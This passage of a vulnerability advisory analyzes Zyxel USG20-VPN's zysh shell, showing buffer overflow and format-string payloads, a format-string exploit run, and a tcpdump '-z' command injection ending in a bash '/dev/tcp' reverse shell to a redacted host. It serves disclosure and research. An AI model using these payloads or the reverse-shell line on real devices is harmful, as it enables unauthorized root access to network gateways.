detailed vulnerability analysis, you can download\nthe Zyxel Firmware 5.10 for \"USG20-VPN - ABAQ - Non-Wireless Edition\"\n(USG20-VPN_5.10.zip [2]). Extract the ZIP archive, then extract the\npassword-protected ZIP archive 510ABAQ0C0.bin contained within, using the\nfollowing password [1]:\n\n4ulPPIs94jnYwUfwwoTqz/a5eRHFRwNYq8zFTrQZaE7XkoTgdzWc.6jea1v1zJb \n\nFinally, extract the Squashfs filesystem image with binwalk or a similar\ntool, e.g.:\n\nraptor@blumenkraft 510ABAQ0C0 % binwalk -e compress.img\n\nThe target binary we will reference throughout our analysys is /bin/zysh,\navailable in the extracted filesystem:\n\nraptor@blumenkraft bin % ls -l zysh\n-rwxr-xr-x  1 raptor  staff  19727292 Sep 23 18:33 zysh*\nraptor@blumenkraft bin % shasum -a 256 zysh\n47ee711a817e33bb2809e91d76b512498ae3cdca1276a2385f404384547404e3  zysh\nraptor@blumenkraft bin % file zysh\nzysh: ELF 32-bit MSB executable, MIPS, N32 MIPS64 rel2 version 1 (SYSV),\ndynamically linked, interpreter /lib32/ld.so.1, for GNU/Linux 2.6.9,\nstripped\n\nYou can easily import it in your favorite disassembler. In Ghidra, we had\nto manually tweak the import options to reflect that the binary was\ncompiled for the N32 ABI [3], importing it as \"MIPS:BE:64:64-32addr:n32\". \nThe same requirement holds for any other binaries compiled for the Cavium\nOcteon III processor, on which our Zyxel USG20-VPN test device is based. \n\n\n--[ 4.1 - Buffer overflows in the \"configure terminal \u003e diagnostic\" command\n\nThe first buffer overflow vulnerability we identified is located in the\nfunction at 0x1013b238, which we dubbed do_emtap():\n\nundefined8 do_emtap(longlong argc, char **argv)\n{\n... \n  char acStack305[129];\n... \n  else {\n    uVar1 = 1;\n    if (argc == 3) {\n      sprintf(acStack305 + 1, \"t%s.sh\", argv[2]); /* VULN #1 */\n      pcVar4 = argv[1];\n      do_emtap_test(pcVar4, acStack305 + 1);\n      do_emtap_test2(pcVar4, acStack305 + 1);\n      report_test();\n      uVar1 = 0;\n    }\n  }\n  return uVar1;\n}\n\nThis function is called when an admin user invokes the diagnostic test\nfunctionality in the Zyxel CLI with two arguments, e.g.:\n\nRouter\u003e configure terminal\nRouter(config)# diagnostic test \u003ctest_name\u003e \u003ctest_num\u003e\n\nThe buffer overflow happens due to the unsafe sprintf() call marked with\nthe \"VULN #1\" comment above, which overflows past the boundary of the\nacStack305 array allocated on the stack with the contents of the \u003ctest_num\u003e\nargument. \n\nUpon exploitation, however, the return statement at 0x1013b2f4 is never\nreached, because the overflow propagates to the other functions that are\ncalled by do_emtap(), which we dubbed do_emtap_test() and do_emtap_test2()\nin the pseudo-code above. More precisely, another overflow happens at the\nsprintf() call below marked as \"VULN #2\", located in the do_emtap_test()\nfunction at 0x1013a8f8. This overflow enables us to gain control over the\npc register when do_emtap_test() returns:\n\nint do_emtap_test(char *test_name, char *test_num)\n{\n... \n  char acStack320[128];\n  char acStack192[128];\n... \n  sprintf(acStack320, \"%s/%s\", \"/tmp/tap\", test_name); /* VULN #3 */\n  mkdir(acStack320, 0x1c0);\n  sprintf(acStack192, \"%s/%s/%s\", \"/usr/local/emtap/test_script\",\n          test_name, test_num); /* VULN #2 */\n  iVar1 = access(acStack192, 0);\n  if (iVar1 != 0) {\n    return 1;\n  }\n... \n}\n\nThe unsafe sprintf() call overflows past the boundary of the acStack192\narray. When do_emtap_test() returns, we are able hijack the control flow. \nHowever, we can only use numeric characters in our hostile buffer,\ntherefore exploitation is extremely unlikely, if at all possible. The\noverflow can be triggered with the following payload:\n\nRouter\u003e configure terminal\nRouter(config)# diagnostic test anything 1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\nProgram received signal SIGBUS, Bus error. \n0x31313130 in ?? ()\n\nA slightly better opportunity for exploitation is represented by another\nstack-based buffer overflow in the above function, marked with the \"VULN\n#3\" comment. This specific overflow can be triggered with the following\npayload:\n\nRouter\u003e configure terminal\nRouter(config)# diagnostic test AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 1\nProgram received signal SIGBUS, Bus error. \n0x41414140 in ?? ()\n\nThis time, our hostile buffer can contain alphanumeric characters in the\nrange [a-zA-Z0-9], plus the underscore \u0027_\u0027. Still far from ideal, but\ndefinitely better than the previously identified exploitation vector.  \n\nA similar vector is provided by yet another stack-based buffer overflow,\nthis time in the function located at 0x1013ada0, which we dubbed\ndo_emtap_test3():\n\nundefined8 do_emtap_test3(char *test_name)\n{\n... \n  char acStack288[127];\n... \n  sprintf(acStack288, \"%s %s/%s | %s -E \\\u0027t[0-9]+\\\\.sh\\\u0027 \u003e %s\", \"/bin/ls\",\n\t  \"/usr/local/emtap/test_script\", test_name, \"/bin/grep\",\n          \"/tmp/tap/test_case_dir.tmp\"); /* VULN #4 */\n  system(acStack288);\n... \n    sprintf(acStack288, \"%s %s\", \"/bin/rm\", \"/tmp/tap/test_case_dir.tmp\");\n    system(acStack288);\n    return 0;\n  }\n... \n}\n\nThis function is called when an admin user invokes the diagnostic test\nfunctionality in the Zyxel CLI with only one argument, e.g.:\n\nRouter\u003e configure terminal\nRouter(config)# diagnostic test \u003ctest_name\u003e\n\nThis time, the unsafe sprintf() call marked with the \"VULN #4\" comment\noverflows past the boundary of the acStack288 array. By exploiting this\noverflow, we can once again overwrite the pc register and hijack the\ncontrol flow. In order to trigger this overflow, the following payload can\nbe used:\n\nRouter\u003e configure terminal\nRouter(config)# diagnostic test AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n/bin/ls: cannot access /usr/local/emtap/test_script/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA: No such file or directory\nProgram received signal SIGBUS, Bus error. \n0x41414140 in ?? ()\n\nIn the mentioned functions, including the one located at 0x1013aa10 that we\ndubbed do_emtap_test2() and that is not immediately reachable via the\ncodepaths triggered by our hostile inputs, there are other instances of\nbuffer overflow caused by the unchecked use of unsafe API functions, such\nas sprintf() and strcpy(). We have not deeply investigated their actual\nreachability, but they should be fixed as well. In addition, many unsafe\nprogramming constructs are present in the rest of the binary. \n\n\n--[ 4.2 - Buffer overflow in the \"debug\" command\n\nThe buffer overflow vulnerability we identified in the code responsible for\nhandling the \"debug\" command is located in the function at 0x1000df70,\nwhich we dubbed do_debug(). \n\nIt is a pretty long function that gets called when an admin (or in some\ncases a limited-admin) user invokes the debug functionality in the Zyxel\nCLI, e.g.:\n\nRouter\u003e debug \u003cargument list\u003e\n\nTo trigger the overflow, the following payload can be used:\n\nRouter\u003e debug gui webhelp redirect AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nRouter\u003e debug gui show webhelp redirect\nProgram received signal SIGBUS, Bus error. \n0x41414140 in ?? ()\n\nThe first command writes a long string in the /tmp/webhelppath file:\n\nint do_debug(ulonglong argc, char **argv)\n{\n... \n  case 0x155:\n    if (DAT_1145e55c != 0x150) {\n      return 0;\n    }\n    pcVar11 = \"/tmp/webhelppath\";\n    if (DAT_1145e564 != 0x154) {\n      return 0;\n    }\nLAB_1000ebdc:\n    pFVar12 = fopen64(pcVar11, \"w\"); /* open file */\n... \n    fputs(argv[4], pFVar12); /* write string to file */\n    fclose(pFVar12);\n    return 0;\n}\n\nThe second command triggers the overflow by reading from the\n/tmp/webhelppath file:\n\nint do_debug(ulonglong argc, char **argv)\n{\n... \n  undefined8 local_e0;\n... \n    if (lVar24 == 0x155) {\n      pFVar12 = fopen64(\"/tmp/webhelppath\", \"r\");\n... \n\t__isoc99_fscanf(pFVar12, \"%s\", \u0026local_e0); /* VULN #5 */\n        fclose(pFVar12);\n        fwrite(\u0026DAT_1013fe18, 1, 9, stdout);\n        puVar22 = \u0026local_e0;\n        pcVar11 = \"Webhelp redirect: %s\\n\";\n      }\nLAB_1000f7d0:\n      fprintf(stdout, pcVar11, puVar22);\n      fwrite(\u0026DAT_1013fe48, 1, 2, stdout);\n      return 0;\n    }\n\nThe vulnerability lies in the use of the unsafe __isoc99_fscanf() API\nfunction, which does not check if the destination string is large enough to\naccommodate the whole source string. This allows us to overwrite the saved\nreturn address and hijack the control flow. Our hostile buffer is limited\nto a length of 255 bytes and can contain only alphanumeric characters in\nthe range [a-zA-Z0-9], plus the underscore \u0027_\u0027, dash \u0027-\u0027, and dot \u0027.\u0027\nspecial characters. \n\nA similar bug can be triggered with the \"debug gui kb redirect\" and \"debug\ngui show kb redirect\" command combination. However, in this case, the\ndestination buffer is too far away from the location where the return\naddress is saved on the stack, therefore we cannot exploit this bug to\ncontrol the pc register. We do not exclude other ways to exploit this\nvulnerability. \n\n\n--[ 4.3 - Buffer overflow in the \"ssh\" command\n\nThe buffer overflow vulnerability we identified in the code responsible for\nhandling the \"ssh\" command is located in the function at 0x10012298, which\nwe dubbed do_ssh():\n\nundefined8 do_ssh(int argc, char **argv)\n{\n... \n  char acStack336[300];\n... \n  sprintf(acStack336, \"/usr/bin/ssh -o UserKnownHostsFile=/dev/null %s\",\n    argv[1]); /* VULN #5 */\n... \n    sVar4 = strlen(acStack336);\n    sprintf(acStack336 + sVar4, \" -p %s\", *(undefined4 *)((int)argv +\n        iVar2)); /* VULN #6 */\n... \n}\n\nYou know the gist by now: there are two stack-based buffer overflows caused\nby the unchecked use of the unsafe API function sprintf(). To trigger the\nfirst overflow the following payload can be used, as an authenticated admin\nor limited-admin user:\n\nRouter\u003e ssh AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@127.0.0.1\nThe authenticity of host \u0027127.0.0.1 (127.0.0.1)\u0027 can\u0027t be established. \nRSA key fingerprint is SHA256:fzNloEaOsmNQLHbhjroUVHkJC9ZTH09A6TRjyK+oiys. \nAre you sure you want to continue connecting (yes/no/[fingerprint])? yes\nWarning: Permanently added \u0027127.0.0.1\u0027 (RSA) to the list of known hosts. \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@127.0.0.1\u0027s password:\n[press enter a few times]\nProgram received signal SIGBUS, Bus error. \n0x41414140 in ?? ()\n\nOnce again, our hostile buffer can contain only alphanumeric characters,\nplus some special characters. As a side note, we noticed that we can inject\narguments that get passed to the underlying /usr/bin/ssh command, albeit\nwith some limitations:\n\nRouter\u003e ssh -@127.0.0.1\nunknown option -- @\nusage: ssh [-46AaCfGgKkMNnqsTtVvXxYy] [-B bind_interface]\n           [-b bind_address] [-c cipher_spec] [-D [bind_address:]port]\n           [-E log_file] [-e escape_char] [-F configfile] [-I pkcs11]\n           [-i identity_file] [-J [user@]host[:port]] [-L address]\n           [-l login_name] [-m mac_spec] [-O ctl_cmd] [-o option] [-p port]\n           [-Q query_option] [-R address] [-S ctl_path] [-W host:port]\n           [-w local_tun[:remote_tun]] destination [command]\n\nBased on our analysis, this lack of input filtering is not exploitable to\ninject interesting command-line arguments (e.g. \"-o ProxyCommand=...\"):\n\nRouter\u003e ssh -oProxyCommand@127.0.0.1\ncommand-line: line 0: Bad configuration option: proxycommand@127.0.0.1\nRouter\u003e ssh -oProxyCommand=@127.0.0.1\n% (after \u0027ssh\u0027): Parse error\nretval = -1\nERROR: Parse error/command not found!\n\n--[ 4.4 - Format string bugs in the \"extension\" argument of some commands\n\nSome zysh commands implement a special \"extension\" argument that allows to\nspecify arbitrary command-line arguments to be passed to the invoked OS\ncommand that underlies each functionality:\n\nRouter\u003e ping 127.0.0.1\n;\n\u003ccr\u003e\ncount\nextension\nforever\ninterface\nsize\nsource\n|\n\nFor instance, if we enter the following zysh command:\n\nRouter\u003e ping 127.0.0.1 extension -c 1\n\nThe OS command line below will be executed via the function located at\n0x101295d0, which we dubbed my_invoke():\n\n$ /bin/zysudo.suid /bin/ping 1.1.1.1 -n -c 3  -c 1\n\nAs you can see, the additional arguments we specified after the \"extension\"\nkeyword are appended to the OS command line. \n\nWe identified format string bugs in the following zysh commands:\n\n* \"ping\" and \"ping6\" commands, handled by the function at 0x1000c0a0, which\n  we dubbed do_ping(). \n* \"traceroute\" and \"traceroute6\" commands, handled by the function at\n  0x1000bc58, which we dubbed do_traceroute(). \n* \"nslookup\" and \"nslookup6\" commands, handled by the function at\n  0x1000c718, which we dubbed do_nslookup(). \n\nThe relevant pseudo-code snippets are:\n\nundefined8 do_ping(int argc, char **argv, char *cmd)\n{\n... \n  if (iVar9 != 0) {\n    sVar5 = strlen(acStack880);\n    pcVar1 = ppcStack96[iVar9 + 1];\n    acStack880[sVar5] = \u0027 \u0027;\n    acStack880[sVar5 + 1] = \u0027\\0\u0027;\n    strcpy(acStack880 + sVar5 + 1, pcVar1); /* append extension args */\n  }\n  if (iVar8 == 0) {\n    sprintf(acStack4976, acStack880); /* VULN: format string bug */\n    __pid = fork();\n... \n}\n\nundefined8 do_traceroute(int argc, char **argv, char *cmd)\n{\n... \n  if (iVar10 != 0) {\n    sVar6 = strlen(acStack864);\n    pcVar2 = argv[iVar10 + 1];\n    acStack864[sVar6] = \u0027 \u0027;\n    acStack864[sVar6 + 1] = \u0027\\0\u0027;\n    strcpy(acStack864 + sVar6 + 1, pcVar2); /* append extension args */\n  }\n... \nLAB_1000be10:\n  sprintf(acStack4960,acStack864); /* VULN: format string bug */\n  __pid = fork();\n... \n}\n\nundefined8 do_nslookup(int argc, char **argv)\n{\n... \n  pcVar4 = stpcpy((char *)((int)\u0026uStack832 + sVar3 + 1), \n      *(char **)((int)argv + iVar2));\n  if (iVar8 != 0) {\n    pcVar4[1] = \u0027\\0\u0027;\n    *pcVar4 = \u0027 \u0027;\n    strcpy(pcVar4 + 1, argv[iVar8 + 1]); /* append extension args */\n  }\n... \n  sprintf(acStack4928, (char *)\u0026uStack832); /* VULN: format string bug */\n  __pid = fork();\n... \n}\n\nAs a side note, in the \"nslookup\" and \"nslookup6\" commands there is also a\nbonus stack-based buffer overflow that is not large enough to reach the\nsaved return address. It can be reproduced with the following payload:\n\nRouter\u003e nslookup AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA server AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA extension AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nProgram received signal SIGBUS, Bus error. \n0x1000ba10 in _ftext ()\n(gdb) x/i $pc\n=\u003e 0x1000ba10 \u003c_ftext+17776\u003e: lw  v1,-10184(s0)\n(gdb) i r s0\ns0: 0x4141414141414141\n\nTo reproduce the format string bugs and leak stack memory contents or crash\nzysh, instead, the following payloads can be used:\n\nRouter\u003e # stack memory leak\nRouter\u003e ping 127.0.0.1 extension %x%x%x%x\nping: unknown host 6eb83a7580808080fefeff001145e560\nRouter\u003e # crash\nRouter\u003e ping 127.0.0.1 extension %n%n%n%n\nProgram received signal SIGSEGV, Segmentation fault. \n0x77bf6768 in vfprintf () from /lib32/libc.so.6\n(gdb) bt\n#0  0x77bf6768 in vfprintf () from /lib32/libc.so.6\n#1  0x77c14f44 in vsprintf () from /lib32/libc.so.6\n#2  0x77bfd980 in sprintf () from /lib32/libc.so.6\n#3  0x1000c38c in _ftext () \u003c\u003c do_ping()\n... \nRouter\u003e # crash\nRouter\u003e ping6 ::1 extension %n%n%n%n\nProgram received signal SIGSEGV, Segmentation fault. \n0x77bf6768 in vfprintf () from /lib32/libc.so.6\n\nRouter\u003e # crash\nRouter\u003e traceroute 127.0.0.1 extension %n%n%n%n\nProgram received signal SIGSEGV, Segmentation fault. \n0x77bf6768 in vfprintf () from /lib32/libc.so.6\n(gdb) bt\n#0  0x77bf6768 in vfprintf () from /lib32/libc.so.6\n#1  0x77c14f44 in vsprintf () from /lib32/libc.so.6\n#2  0x77bfd980 in sprintf () from /lib32/libc.so.6\n#3  0x1000be18 in _ftext () \u003c\u003c do_traceroute()\n... \nRouter\u003e # crash\nRouter\u003e traceroute6 ::1 extension %n%n%n%n\nProgram received signal SIGSEGV, Segmentation fault. \n0x77bf6768 in vfprintf () from /lib32/libc.so.6\n\nRouter\u003e # stack memory leak\nRouter\u003e nslookup 127.0.0.1 extension %x%x%x%x\nUsing domain server:\nName: 127.0.0.1\nAddress: 127.0.0.1#53\nAliases:\n\nHost 0bd01390 not found: 3(NXDOMAIN)\nRouter\u003e # crash\nRouter\u003e nslookup 127.0.0.1 extension %n%n%n%n\n\nProgram received signal SIGSEGV, Segmentation fault. \n0x77bf6768 in vfprintf () from /lib32/libc.so.6\n(gdb) bt\n#0  0x77bf6768 in vfprintf () from /lib32/libc.so.6\n#1  0x77c14f44 in vsprintf () from /lib32/libc.so.6\n#2  0x77bfd980 in sprintf () from /lib32/libc.so.6\n#3  0x1000c8c0 in _ftext () \u003c\u003c do_nslookup()\n... \nRouter\u003e # crash\nRouter\u003e nslookup6 ::1 extension %n%n%n%n\nProgram received signal SIGSEGV, Segmentation fault. \n0x77bf6768 in vfprintf () from /lib32/libc.so.6\n\nWe just confirmed that we control the format strings passed as argument to\nthe sprintf() API function in different locations of our target binary. \n\n\n--[ 4.5 - OS command injection in the \"packet-trace\" command\n\nThe OS command injection we identified in the code responsible for handling\nthe \"packet-trace\" command is located in the function at 0x10010258, which\nwe dubbed do_packet-trace(). \n\nThis function builds the command line for the /usr/sbin/tcpdump binary,\nbased on the arguments with which the \"packet-trace\" command is invoked. \nThe available arguments are:\n\nRouter# packet-trace\n;\n\u003ccr\u003e\ndst-host\nduration\nextension-filter\nfile\ninterface\nip-proto\nipv6-proto\nport\nsrc-host\n|\n\nThe \"extension-filter\" argument is particularly interesting, because it\nallows to specify additional arbitrary command-line arguments to be passed\nto tcpdump. For instance, if we enter the following zysh command:\n\nRouter# packet-trace extension-filter -ln -i lo -w -a -W 1 -G 1 -z id\n\nThe OS command line below will be executed via the function located at\n0x101295d0, which we dubbed my_invoke():\n\n$ /usr/sbin/tcpdump -n -i eth0 -ln -i lo -w -a -W 1 -G 1 -z id\n\nAs you can see, we are using a variation of a well-known GTFOBins payload\n[4] that allows us to execute the following OS command (yes, command-line\nswitches that begin with a \u0027-\u0027 are accepted):\n\n$ id -a\n\nRefer to the manual page of tcpdump [5] for further details on how each\ncommand-line switch is interpreted. Seeing it all in action from the Web\nConsole, as an authenticated admin or limited-admin user:\n\nRouter# packet-trace extension-filter -ln -i lo -w -a -W 1 -G 1 -z id\ntcpdump: listening on lo, link-type EN10MB (Ethernet), snapshot length 65535 bytes\nMaximum file limit reached: 1\n1 packet captured\n2 packets received by filter\n0 packets dropped by kernel\nuid=0(root) gid=0(root) groups=0(root)\n\nWe got arbitrary command execution as root! We just need to find a way to\nexploit it to escape the restricted shell environment. \n\n\n--[ 5 - Exploitation\n\nIn the following sections, we will discuss exploitation of the identified\nvulnerabilities. \n\n\n--[ 5.1 - Buffer overflows\n\nThe zysh binary is in a sorry state when it comes to modern countermeasures\nagainst exploitation of memory corruption bugs:\n\n* No RELRO\n* No stack canary\n* NX disabled\n* No PIE\n* Has RWX segments\n\nThat said, it looks like the buffer overflow vulnerabilities described in\nthis advisory cannot be exploited to achieve arbitrary code execution after\nall, despite our gut feeling... In summary:\n\n* MIPS alphanumeric shellcode is not a thing [6]. \n* A pure ROP chain is also not feasible, at least with the memory mapping\n  used by the device and firmware version combination that we could test. \n\nWe can solve the first problem by storing our shellcode (along with a\ncopious number of NOP-equivalent opcodes) in the value of the TERM\nenvironment variable that gets passed to the remote system via sshd (or\nin.telnetd). At this point, we still need to be able to overwrite the\nstored return address with a value that points to our NOP sled and\nshellcode payload, though. Unfortunately, a partial overwrite would not\nwork in this case, because our target architecture is big endian and\ntherefore we would only be able to overwrite the most significant byte(s),\nachieving nothing of note. On a device and firmware combination with a\nslightly different memory mapping, however, we might be able to pull this\noff and hijack the control flow. \n\nWe are not well-versed in the fine and obscure art of MIPS shellcoding and\nexploitation, so we might have missed something. Feel free to try this\nchallenge on your own!\n\nAs a final note, we also looked into the possibility to exploit the many\nunsafe calls to system() present in the code in order to inject arbitrary\nOS commands. However, we could not slip past the pretty aggressive input\nfilters implemented by zysh. Too bad. \n\n\n--[ 5.2 - Format string bugs\n\nAs discussed earlier, we control the format strings passed as argument to\nthe sprintf() API function in different locations of our target binary. As\na proof of concept, this allowed us to leak stack memory contents and crash\nzysh. \n\nIt is now time to see if we are able to exploit the identified format\nstring bugs to execute arbitrary code and escape the restricted shell\nenvironment... At first glance, this does not look feasible, because once\nagain we are limited in the characters that we can use in our hostile\nbuffer (alphanumeric characters plus some special characters in the 7-bit\nASCII set). \n\nHowever, we devised a workaround: instead of placing our retloc addresses\nat the beginning of the hostile format string as is customary, we can\ninject them in the process memory via the TERM environment variable! The\ndirect parameter access feature of glibc, together with our very own format\nstring exploitation technique for RISC architectures [7], will do the rest. \n\nLong story short, we put together a proof-of-concept exploit [8] that does\nthe following:\n\n* Authenticate and access the target zysh via SSH, injecting our payload\n  (retloc sled + NOP sled + shellcode + padding) via the TERM environment\n  variable. \n\n* Leak a stack address via the format string bug in the \"ping\" command, and\n  use it to calculate the address of our injected shellcode near the bottom\n  of the stack, which changes slightly at each zysh execution. \n\n* Craft another hostile format string to use as an argument to the \"ping\"\n  command and overwrite the .got entry of fork(), which gets called right\n  after the vulnerable sprintf(), with the shellcode address, using a\n  variation of our write-one-byte-at-a-time technique designed for RISC\n  architectures such as MIPS and SPARC. \n\n* Interact with the spawned bash shell!\n\nWe initially thought that Python/Paramiko would be a good language choice\nfor the implementation, but we quickly changed our mind. In the end, we\ndecided to go full old-school and developed our exploit in Tcl/Expect. \nHere it is in action:\n\nraptor@blumenkraft ~ % ./raptor_zysh_fhtagn.exp \u003cREDACTED\u003e admin password\nraptor_zysh_fhtagn.exp - zysh format string PoC exploit\nCopyright (c) 2022 Marco Ivaldi \u003craptor@0xdeadbeef.info\u003e\n\nLeaked stack address:\t0x7fe97170\nShellcode address:\t0x7fe9de40\nBase string length:\t46\nHostile format string:\t%.18u%1801$n%.169u%1801$hn%.150u%1801$hhn%.95u%1802$hhn\n\n*** enjoy your shell! ***\n\nsh-5.1$ uname -snrmp\nLinux USG20-VPN 3.10.87-rt80-Cavium-Octeon mips64 Cavium Octeon III V0.2 FPU V0.0\nsh-5.1$ id\nuid=10007(admin) gid=10000(operator) groups=10000(operator)\n\nOnce we have access to a bash shell on the underlying embedded Linux OS, it\nshould be pretty easy to escalate privileges to root, by leveraging local\nvulnerabilities [1]. \n\nIt should not be too hard to automate/weaponize our exploit to make it work\nagainst other targets. This is left as an exercise. \n\nIn conclusion, format string bugs are a powerful exploit primitive, one of\nour favorites. Once again, they proved to be up to the task even in a\nconstrained scenario such as the one we described. \n\n\n--[ 5.3 - OS command injection\n\nWe managed to find a way to execute arbitrary OS commands by injecting\nspecially-crafted arguments into the tcpdump command line. However,\nexploitation of this vulnerability to escape the restricted shell\nenvironment is not straightforward, due to a number of constraints:\n\n* We can only execute OS commands that do something useful to reach our\n  goal when invoked with exactly one command-line argument. \n\n* Executing \"bash -i\" (or similar commands such as gdb and python) directly\n  does not work, because the shell would die with a \"Bad file descriptor\"\n  error or similar. \n\n* We could upload a shellcode binary via the FTP service (enabled by\n  default on our test device) in the /etc/zyxel/ftp/tmp directory, but to\n  be able to execute it we would need to find a way to turn the file\u0027s\n  executable bit on; we might also be able to abuse some zysh functionality\n  to create an executable file in /etc/zyxel/ftp/tmp that we can later\n  overwrite via FTP or some other means that keep the executable bit on,\n  but we could not find an immediate way to do this. \n\n* We even crafted plain-text traffic to inject arbitrary commands into the\n  pcap output file saved by tcpdump, and tried executing this file as a\n  bash script, but bash would refuse to run it (\"cannot execute binary\n  file\"). \n\n* Alternatively, we could directly upload a shell script via FTP and\n  run it as an argument to bash, but before its execution it would get\n  overwritten by tcpdump; in theory, we could try winning a race by\n  continuously uploading the shell script while tcpdump is executing. \n  Luckily, before we had to implement this, we found a better way. \n\nWe were indeed lucky in finding almost by accident the reliable way to\nexploit this vulnerability that we are going to describe, which involves\nthe use of standard output as a tcpdump output file (\"-w -\" command-line\noption) and some eldritch file descriptor trickery. \n\nIn order to escape the restricted shell environment and execute arbitrary\ncommands as root on the underlying embedded Linux OS, first authenticate to\nthe Web Console at https://\u003cREDACTED\u003e/webconsole/ as either an admin or\nlimited-admin user. Then, run the following commands:\n\nRouter# packet-trace extension-filter -ln -i lo -w - -W 1 -G 1 -z python\ntcpdump: listening on lo, link-type EN10MB (Ethernet), snapshot length 65535 bytes\n... \nMaximum file limit reached: 1\n5 packets captured\n10 packets received by filter\n0 packets dropped by kernel\nRouter# Python 2.7.14 (default, Sep 23 2021, 23:30:37)\n[GCC 4.7.0] on linux2\nType \"help\", \"copyright\", \"credits\" or \"license\" for more information. \n\u003e\u003e\u003e\n[press enter a few times]\nRouter#\nRouter#\nRouter# packet-trace extension-filter -ln -i lo -w - -W 1 -G 1 -z bash\ntcpdump: listening on lo, link-type EN10MB (Ethernet), snapshot length 65535 bytes\n... \nMaximum file limit reached: 1\n5 packets captured\n10 packets received by filter\n0 packets dropped by kernel\nRouter# #\n[press enter again]\n  File \"\u003cstdin\u003e\", line 1\n    ^\nSyntaxError: invalid syntax\n\u003e\u003e\u003e import os\n\u003e\u003e\u003e os.system(\"bash -i \u003e\u0026 /dev/tcp/\u003cREDACTED\u003e/23234 0\u003e\u00261\")\n\nThis will get you a privileged reverse shell:\n\nraptor@gollum:~$ nc -nvlp 23234\nListening on 0.0.0.0 23234\nConnection received on \u003cREDACTED\u003e 54330\nbash: cannot set terminal process group (25792): Inappropriate ioctl for device\nbash: no job control in this shell\nbash-5.1# uname -a\nuname -a\nLinux USG20-VPN 3.10.87-rt80-Cavium-Octeon #2 Fri Sep 24 00:34:21 CST 2021 mips64 Cavium Octeon III V0.2 FPU V0.0 ROUTER7000_REF 